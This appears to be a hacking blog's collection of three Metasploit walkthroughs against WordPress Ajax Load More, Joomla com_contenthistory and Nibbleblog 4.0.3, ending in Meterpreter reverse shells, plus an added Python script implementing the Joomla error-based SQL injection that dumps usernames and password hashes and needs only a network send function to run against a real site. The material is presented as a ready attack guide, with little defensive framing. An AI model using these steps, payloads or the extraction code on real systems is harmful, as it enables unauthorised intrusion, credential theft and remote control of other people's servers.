CMS hacking

Good Evening Friends. In our previous howto we saw how to use the Joomla com_contenthistory error-based SQL injection module. Today we will see how to exploit the WordPress Ajax Load More PHP upload vulnerability using Metasploit. The module exploits an arbitrary file upload in version 2.8.1.1 of the Ajax Load More plugin: an authenticated user can upload a PHP file, which the web server then executes. I have tested this exploit on the above said plugin version on WordPress 4.1.3 on Windows. The only downside is that the exploit requires valid WordPress credentials. Start Metasploit and load the exploit as shown below.

[screenshot: wpajaxfu1]

Set the payload as shown below.

[screenshot: wpajaxfu2]

Type the command “show options” to see the options this exploit requires.

[screenshot: wpajaxfu3]

Set the required options as shown below: the remote IP address, the target URI of the WordPress installation, and the username and password of a valid WordPress account.

[screenshot: wpajaxfu4]

After setting all the options, run “show options” once more to verify them, as shown below.

[screenshot: wpajaxfu5]

Type the command “exploit” and we get a Meterpreter session, as shown below.

[screenshot: wpajaxfu6]

Good Evening Friends. Today we will see how to use the recently disclosed Joomla com_contenthistory error-based SQL injection to enumerate usernames and password hashes from a remote server running Joomla. The vulnerability affects Joomla versions 3.2 through 3.4.4 and needs no authentication, so no credentials are required this time. Metasploit ships an auxiliary module for it. I am testing it against Joomla version 3.4.4.

[screenshot: joomla error-based sql injection0]

Start Metasploit and load the module as shown below.

[screenshot: joomla error-based sql injection1]

Set the required options (at minimum the remote host and the target URI of the Joomla installation) as shown below and type the command “exploit”. The module extracts one table row per request through the database error messages, so give it some time; when it finishes, the usernames and password hashes are saved as a text file (Metasploit loot) on your system, as shown below.

[screenshot: joomla error-based sql injection3]

Now open the text file with any text editor available in Kali Linux. I have used gedit.

[screenshot: joomla3]

This is the file we downloaded. As you can see below, it lists the usernames and password hashes of the Joomla installation. Note that these are salted hashes (bcrypt on Joomla 3.2 and later), so they still have to be cracked offline before they can be used to log in.

[screenshot: joomla error-based sql injection4]
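To make clearer what the module is doing between “exploit” and the loot file, here is an added example (not the Metasploit module's code, and not part of the original post) that reproduces the error-based extraction loop in Python. It uses the classic MySQL duplicate-entry trick (GROUP BY on a key containing floor(rand(0)*2)) on which the com_contenthistory module relies; the marker strings, the jos_ table prefix, the fake_joomla responder and its two user rows are all constructed for the example, and the HTTP transport is left to the caller as a callable so the code runs offline.

```python
import re
from html import unescape
from typing import Callable, List, Optional, Tuple

# Markers that bracket the leaked value inside the database error so it can be
# cut out reliably. They travel as hex literals: the injection rides in a GET
# parameter and a quote character would only make the payload fragile.
LEFT, RIGHT = "qxq", "qzq"

Transport = Callable[[str], Tuple[int, str]]   # sqli string -> (HTTP status, body)


def hexlit(s: str) -> str:
    """MySQL hex literal for a string, e.g. 'qxq' -> 0x717871 (no quotes needed)."""
    return "0x" + s.encode().hex()


def duplicate_entry_payload(expr: str) -> str:
    """Wrap a scalar subquery so MySQL leaks its value in a 'Duplicate entry' error.
    GROUP BY on a key containing floor(rand(0)*2) is evaluated twice per row, the
    temporary table's unique key collides, and MySQL prints the colliding key,
    markers and value included, in the error text."""
    return (
        "(select 1 from (select count(*),concat((select concat("
        f"{hexlit(LEFT)},({expr}),{hexlit(RIGHT)})),floor(rand(0)*2))x "
        "from information_schema.tables group by x)a)"
    )


def user_row_expr(index: int, prefix: str = "jos_") -> str:
    """Row <index> of Joomla's users table as 'username:hash', one row per request.
    The table prefix is site-specific; jos_ is an assumption for the example."""
    return f"select concat(username,0x3a,password) from {prefix}users limit {index},1"


_DUP = re.compile(
    r"Duplicate entry '" + LEFT + r"(.*?)" + RIGHT + r"[01]' for key 'group_key'"
)


def leaked_value(body: str) -> Optional[str]:
    """Pull the value out of the (HTML-escaped) error page, or None if nothing leaked."""
    m = _DUP.search(unescape(body))
    return m.group(1) if m else None


def is_vulnerable(send: Transport, flag: str = "xyzzy123") -> bool:
    """Same idea as the module's check: inject a known flag and see if it comes back."""
    status, body = send(duplicate_entry_payload(f"select {hexlit(flag)}"))
    return status == 500 and leaked_value(body) == flag


def enumerate_users(send: Transport, prefix: str = "jos_",
                    max_rows: int = 500) -> List[Tuple[str, str]]:
    """Walk the users table with LIMIT n,1 until a request no longer errors
    (past the last row the subquery is NULL and no duplicate key is produced)."""
    rows = []
    for i in range(max_rows):
        status, body = send(duplicate_entry_payload(user_row_expr(i, prefix)))
        value = leaked_value(body) if status == 500 else None
        if value is None:
            break
        user, _, pw_hash = value.partition(":")
        rows.append((user, pw_hash))
    return rows


# Constructed stand-in for the vulnerable endpoint so the example needs no network.
CONSTRUCTED_USERS = [
    ("admin", "$2y$10$constructedbcrypthash.admin"),
    ("editor", "$2y$10$constructedbcrypthash.editor"),
]


def fake_joomla(payload: str) -> Tuple[int, str]:
    """Answer the way a vulnerable site does: an HTML-escaped MySQL error (HTTP 500)
    when a duplicate key occurs, an ordinary page otherwise."""
    m = re.search(r"limit (\d+),1", payload)
    if m:
        i = int(m.group(1))
        if i >= len(CONSTRUCTED_USERS):
            return 200, "<html><body>History</body></html>"   # subquery NULL, no error
        value = ":".join(CONSTRUCTED_USERS[i])
    else:
        m = re.search(r"\(select 0x([0-9a-f]+)\)", payload)
        if not m:
            return 200, "<html><body>History</body></html>"
        value = bytes.fromhex(m.group(1)).decode()
    leaked = f"{LEFT}{value}{RIGHT}1"
    return 500, ("<h1>Error</h1><p>Duplicate entry &#039;" + leaked
                 + "&#039; for key &#039;group_key&#039; SQL=SELECT ...</p>")


if __name__ == "__main__":
    if is_vulnerable(fake_joomla):
        for user, pw_hash in enumerate_users(fake_joomla):
            print(f"{user}:{pw_hash}")
```

Against a real target, `send` would be a function that places the payload in the vulnerable request parameter and returns the status code and body; everything else stays the same, which is why the loop terminates on the first request that does not produce the error rather than on a fixed row count.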

Good Evening Friends. Recently Metasploit released an exploit for the Nibbleblog file upload vulnerability. For those who don't know, Nibbleblog is a lightweight PHP blog engine; it is about the simplest blog creation system around. In this scenario we will compromise a remote system running Nibbleblog 4.0.3 by uploading a PHP file through the file upload vulnerability. The only downside of this exploit is that it requires the blog's admin credentials. Update Metasploit and start it. Type the command “search nibbleblog” to list all modules related to Nibbleblog, as shown below.

[screenshot: nibbleblog1]

Load the exploit as shown below.

[screenshot: nibbleblog2]

Set all the required options as shown below. I am running Nibbleblog on a WAMP server on another system, so I am giving its IP address as the remote host.

[screenshot: nibbleblog3]

Type the command “show payloads” to see the payloads compatible with this exploit. You will see the list as shown below.

[screenshot: nibbleblog4]

Choose the payload “php/meterpreter/reverse_tcp”.

[screenshot: nibbleblog5]

Set the payload's required options, i.e. LHOST, which is the IP address of your Kali machine. As I already told you, we need the credentials of the blog we want to attack. Type the command “exploit”. Even though you get an error as shown below, don't worry: the exploit has done its job and the file has been uploaded. The error means the module could not trigger the uploaded file itself, so in the next steps we start a listener and trigger it by hand.

[screenshot: nibbleblog6]

Now we have to start a listener for the reverse_tcp connection. Load Metasploit's generic handler (exploit/multi/handler) as shown below and set the required options: use the same payload, LHOST and LPORT that were set for the upload, otherwise the callback will not be caught.

[screenshot: nibbleblog7]

Type the command “exploit”. The handler will start and wait at the stage shown below.

[screenshot: nibbleblog8]

Now open a browser. The file you just uploaded is saved by default as image.php on the remote system. Go to the exact path highlighted below; the only thing that may differ for you is the IP address. Hit Enter. Requesting the file makes the web server execute the PHP payload, which connects back to our handler.

[screenshot: nibbleblog9]

Now if you go back to the terminal, you should already have a Meterpreter session, as shown below. Happy Hacking.

[screenshot: nibbleblog10]

Hope it was helpful.